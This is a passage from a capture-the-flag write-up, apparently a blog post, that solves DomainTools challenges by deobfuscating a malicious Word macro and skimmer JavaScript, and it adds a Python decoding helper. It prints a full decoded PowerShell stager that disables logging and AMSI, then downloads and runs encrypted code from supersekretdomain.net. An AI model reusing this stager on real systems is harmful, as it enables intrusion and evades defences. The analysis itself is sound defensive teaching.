cxn = cxn + "sAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAAzADgA"
cxn = cxn + "NwBBADEALgBIAGUAQQBEAEUAUgBzAC4AQQBEAEQAKAAiAEMAbw"
cxn = cxn + "BvAGsAaQBlACIALAAiAHEAQgBuAEkAcABvAFUAagBlAFkAQQBy"
cxn = cxn + "AHgAWABIAHAAPQBVAFEAWABoADQAcQBxAGwAUgByAGYAYwB3AE"
cxn = cxn + "IAOABEAEkAVwBkAHYAdAA4AGUAdwAzAEoAQQA9ACIAKQA7ACQA"
cxn = cxn + "RABBAHQAYQA9ACQAMwA4ADcAYQAxAC4ARABPAFcAbgBsAE8AYQ"
cxn = cxn + "BEAEQAYQBUAEEAKAAkAHMAZQByACsAJABUACkAOwAkAEkAVgA9"
cxn = cxn + "ACQARABhAFQAQQBbADAALgAuADMAXQA7ACQARABhAFQAQQA9AC"
cxn = cxn + "QARABhAFQAYQBbADQALgAuACQAZABhAHQAYQAuAEwAZQBuAGcA"
cxn = cxn + "VABoAF0AOwAtAEoATwBJAE4AWwBDAGgAQQBSAFsAXQBdACgAJg"
cxn = cxn + "AgACQAUgAgACQARABBAFQAYQAgACgAJABJAFYAKwAkAEsAKQAp"
cxn = cxn + "AHwASQBFAFgA"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create cxn, Null, objConfig, intProcessID
End Function
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AutoOpen            |Runs when the Word document is opened        |
|AutoExec  |Document_Open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|AutoExec  |Auto_Open           |Runs when the Excel Workbook is opened       |
|Suspicious|powershell          |May run PowerShell commands                  |
|Suspicious|ShowWindow          |May hide the application                     |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Dridex Strings      |Dridex-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

WARNING msoffcrypto failed to interpret file vbaProject.bin or determine whether it is encrypted: Unrecognized file format

So we can see some embedded PowerShell code as well… and it’s Base64 encoded.  Presumably that’s what we care about, so let’s examine it.  First we’ll copy and paste all of these lines into a new file (e.g. pshell.txt):

cxn = cxn + "____________

Then we’ll use a bit of sed-ery to clean up the concatenation stuff (the first ‘sed’ command removes the concatenation and variable bits at the start of each line, and the second one removes the trailing double quotes):

user@system:~$ sed -e 's| cxn = cxn + "||' pshell.txt | sed -e 's|"$||' > cleanps.txt

And then we’ll add the missing bit from the first statement (‘SQBmACgAJABQAFMAVg’) to the start of the file.  Finally, we’ll clean up the line breaks with ‘tr’ and pipe that to a base64 decode:

user@system:~$ cat cleanps.txt | tr -d '\n' | base64 -d
If($PSVerSiOnTablE.PSVERsion.MAjoR -Ge 3){$d3982=[ReF].ASsemBly.GETType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($D3982){$9E5ab=$D3982.GEtVAlUe($nUll);IF($9E5aB['ScriptB'+'lockLogging']){$9E5AB['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$9e5Ab['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[CoLleCTIons.GEneRiC.DiCtIoNArY[sTrINg,SyStEm.OBJECt]]::nEW();$vAL.ADd('EnableScriptB'+'lockLogging',0);$VAl.ADD('EnableScriptBlockInvocationLogging',0);$9E5Ab['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}Else{[ScrIPtBLOck]."GETFIe`lD"('signatures','N'+'onPublic,Static').SETValUE($null,(NEW-OBJeCT CoLLeCTiONS.GeNERIc.HAsHSeT[StrING]))}$ReF=[REf].AsseMbLy.GetTYPE('System.Management.Automation.AmsiUtils');$ReF.GEtFIeLD('amsiInitFailed','NonPublic,Static').SEtVAlUe($NUlL,$TRue);};[SYstEm.NEt.SERvicEPOinTMaNAGer]::EXPeCt100ContiNuE=0;$387a1=NEw-ObJEct SYsTEm.NeT.WebClieNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$387a1.HeADers.AdD('User-Agent',$u);$387A1.HeADErS.ADD('User-Agent',$u);$387a1.PrOxY=[SYsTEM.NET.WEbREQueSt]::DeFAULtWebProxy;$387a1.PRoXy.CrEDENTIALs = [SysTeM.NEt.CreDeNtiALCAcHE]::DeFaultNETWOrkCREDentialS;$Script:Proxy = $387a1.Proxy;$K=[SYsTEM.TEXt.EncoDINg]::ASCII.GEtBYteS('m}qn[O:Cx?3Ail/cz1b8fp+w2gs{X]QL');$R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CouNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXOR$S[($S[$I]+$S[$H])%256]}};$ser=$([Text.EncodInG]::UnICodE.GETSTrING([COnverT]::FRoMBAsE64STRiNG('aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA')));$t='/news.php';$387A1.HeADERs.ADD("Cookie","qBnIpoUjeYArxXHp=UQXh4qqlRrfcwB8DIWdvt8ew3JA=");$DAta=$387a1.DOWnlOaDDaTA($ser+$T);$IV=$DaTA[0..3];$DaTA=$DaTa[4..$data.LengTh];-JOIN[ChAR[]](& $R $DATa ($IV+$K))|IEX

Oh joy… more encoding. Let’s check those base64 encodings within it and see.  The first one is ‘aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA’:

user@system:~$ echo "aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA" | base64 -d
http://supersekretdomain.net:6666

Got it on the first try!  Since all we need is the domain, we’ve got it now!  The answer is:

supersekretdomain.net
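
The sed/tr/base64 pipeline above and the inner Base64 decode from the last step, as one added Python example that is not part of the write-up. One caveat it handles: `-enc` takes Base64 over UTF-16LE, so `base64 -d` actually emits a NUL byte after every character (the terminal hides them, which is why the dump above reads as plain text, but they break grep and string matching); decoding with the UTF-16LE codec gives clean text. The macro text it parses is constructed with a benign stand-in script that embeds the page’s own inner Base64 string; the regexes and helper names are this example’s, not olevba’s.

```python
import base64
import re
from urllib.parse import urlparse

# The inner UTF-16LE Base64 literal exactly as it appears in the write-up.
INNER_B64 = "aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA"

# Constructed, benign stand-in for the real payload: it only decodes the
# server string the same way the dropper did and echoes it.
SAMPLE_SCRIPT = ("$ser=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
                 + INNER_B64 + "'));Write-Output $ser")

def encode_powershell_enc(script: str) -> str:
    """What `powershell -enc` consumes: Base64 over the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_powershell_enc(b64: str) -> str:
    """Inverse of the above. Decoding as raw bytes would leave a NUL after
    every character; the UTF-16LE codec removes them."""
    return base64.b64decode(b64).decode("utf-16-le")

def build_sample_vba(script: str, width: int = 50) -> str:
    """Constructed stand-in for the NewMacros.bas routine: the -enc blob split
    across `cxn = cxn + "..."` lines, as in the dumped macro."""
    enc = encode_powershell_enc(script)
    chunks = [enc[i:i + width] for i in range(0, len(enc), width)]
    lines = ["Public Function odK() As Variant", "Dim cxn As String",
             f'cxn = "powershell -noP -sta -w 1 -enc {chunks[0]}"']
    lines += [f'cxn = cxn + "{c}"' for c in chunks[1:]]
    lines.append("End Function")
    return "\n".join(lines)

# `v = "..."` or `v = v + "..."`, one statement per line; "" is an escaped quote.
CONCAT_RE = re.compile(r'^\s*(\w+)\s*=\s*(?:\1\s*\+\s*)?"((?:[^"]|"")*)"\s*$', re.M)

def reassemble_strings(vba_text: str) -> dict:
    """Join every concatenation chain, keyed by variable name; this replaces
    the copy/paste, sed and tr steps of the write-up."""
    out = {}
    for var, lit in CONCAT_RE.findall(vba_text):
        out[var] = out.get(var, "") + lit.replace('""', '"')
    return out

# Spellings of the EncodedCommand switch commonly seen on command lines
# (PowerShell accepts any unambiguous prefix of the parameter name).
ENC_RE = re.compile(r"(?<!\S)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def extract_encoded_command(command_line: str):
    m = ENC_RE.search(command_line)
    return decode_powershell_enc(m.group(1)) if m else None

INNER_RE = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.I)

def decode_inner_strings(script: str) -> list:
    """Decode each [Convert]::FromBase64String('...') literal. If every second
    byte is NUL the payload is ASCII text stored as UTF-16LE (what
    [Text.Encoding]::Unicode.GetString expects); otherwise try UTF-8."""
    out = []
    for b64 in INNER_RE.findall(script):
        raw = base64.b64decode(b64)
        try:
            if len(raw) % 2 == 0 and not any(raw[1::2]):
                out.append(raw.decode("utf-16-le"))
            else:
                out.append(raw.decode("utf-8"))
        except UnicodeDecodeError:
            out.append(raw.hex())        # keep the bytes visible, not silently dropped
    return out

def hostnames(texts) -> list:
    """Host part of every decoded string that parses as a URL."""
    return [h for h in (urlparse(t).hostname for t in texts) if h]

if __name__ == "__main__":
    vba = build_sample_vba(SAMPLE_SCRIPT)
    cmd = reassemble_strings(vba)["cxn"]
    script = extract_encoded_command(cmd)
    inner = decode_inner_strings(script)
    print(script)
    print(inner, hostnames(inner))
```

Run against the real olevba dump, reassemble_strings would return the whole ‘powershell -noP …’ command line under ‘cxn’ (and the harmless ‘strComputer’ literal), and decode_inner_strings would give back the same http://supersekretdomain.net:6666 the write-up found by hand.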

Challenge: RIP Your E-Commerce Website (40 Points)

Directions: One of your developers found some weird JavaScript embedded on your company’s main e-commerce website. The flag is the URL!

File: hello (Note: zipped here but originally just raw JavaScript)

Solution: There are probably definitely better ways to do this, but in my case I just opened the file and pushed it through a beautifier/deobfuscator (e.g. https://www.jsnice.org). The first entry in the code was “var u=…”, so why not just see what that ends up evaluating to in a disposable browser?

To do that, I first created a new index.html page:

user@system:~$ cat index.html
<html>
<head><title>Be Bad</title><script src="hello.js"></script></head>
<body>Boom</body>
</html>

Then I just opened it in Chromium, opened the console (Developer Tools –> Console), and typed the variable name of ‘u’:

u
{snd: null, o7d6e88f271f3ac078a708f7123e10e14: "http://domaintoolsctf.com/checkout/form.js", myid: "1568145254227-607316569", clk: ƒ, send: ƒ}

And we find the URL!

http://domaintoolsctf.com/checkout/form.js

 

[Fin]

Okay, that’s it for the second round… next up is the Reversing section of the DomainTools CTF.  Until next time, good hunting!
